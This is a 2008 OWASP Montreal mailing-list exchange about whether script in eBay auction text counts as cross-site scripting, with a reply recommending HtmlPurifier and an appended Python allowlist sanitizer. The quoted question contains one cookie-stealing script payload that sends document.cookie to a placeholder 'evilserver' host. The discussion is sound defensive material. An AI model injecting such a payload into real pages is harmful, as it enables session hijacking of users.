[ OWASP - Montreal ] Confusion about XSS...
Sean Coates
sean at caedmon.net
Wed Dec 17 14:13:44 EST 2008
> Am I wrong, or to be declared an XSS vuln, must the script be
> injected from an external source, not the site itself?
>
> What if eBay allows HTML script tags in the auction text, is it an
> XSS? If not, what do you call this? The site is the source...
>
> "Watch for sale. <script type="text/javascript">document.location="http://evilserver/stealcookie.php?
> "%2bdocument.cookie</script>"
>
> This script would send the authenticated user cookie to the
> attacker, allowing session hijacking.

I would consider that a form of cross site scripting, even if it's not
technically "cross site." eBay definitely should be filtering that
out... think "Samy is my hero."

This is where HtmlPurifier serves well (-:

S
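
Added example (not part of the original post, and not HTML Purifier's own code): a minimal Python standard-library sketch of the allowlist filtering the reply recommends for user-supplied auction text. The tag list, the http(s)-only link rule, and the names `ListingSanitizer` and `sanitize_listing` are assumptions made for illustration.

```python
import html
import re
from html.parser import HTMLParser

# Assumed policy for this sketch: a few formatting tags, links over http(s) only.
ALLOWED_TAGS = {"b", "i", "em", "strong", "p", "br", "ul", "li", "a"}
VOID_TAGS = {"br"}
DROP_CONTENT = {"script", "style"}   # the text inside these is discarded as well
SAFE_HREF = re.compile(r"https?://", re.IGNORECASE)

class ListingSanitizer(HTMLParser):
    """Re-serialise untrusted HTML, keeping only allowlisted tags and attributes."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip = 0   # > 0 while inside <script> or <style>

    def handle_starttag(self, tag, attrs):
        if tag in DROP_CONTENT:
            self.skip += 1
        elif tag in ALLOWED_TAGS and not self.skip:
            kept = ""
            for name, value in attrs:
                # Only href on <a>, and only absolute http(s) URLs. Every other
                # attribute (event handlers, style, other URL schemes) is dropped.
                if tag == "a" and name == "href" and value and SAFE_HREF.match(value):
                    kept = ' href="%s" rel="nofollow"' % html.escape(value, quote=True)
            self.out.append("<%s%s>" % (tag, kept))

    def handle_endtag(self, tag):
        if tag in DROP_CONTENT:
            self.skip = max(0, self.skip - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS and not self.skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self.skip:
            # Text is always re-escaped, so it can never become markup again.
            self.out.append(html.escape(data, quote=False))

def sanitize_listing(untrusted):
    """Return the listing text with everything outside the allowlist removed."""
    parser = ListingSanitizer()
    parser.feed(untrusted)
    parser.close()   # flush buffered input; an unclosed <script> drops the rest
    return "".join(parser.out)

if __name__ == "__main__":
    # Constructed sample modelled on the auction text quoted above.
    sample = 'Watch for sale. <script type="text/javascript">/* placeholder */</script><b>Mint</b>'
    print(sanitize_listing(sample))
```

This sketch does not balance unclosed tags or normalise nesting; a maintained sanitizer such as the one named in the reply is the better choice for production use.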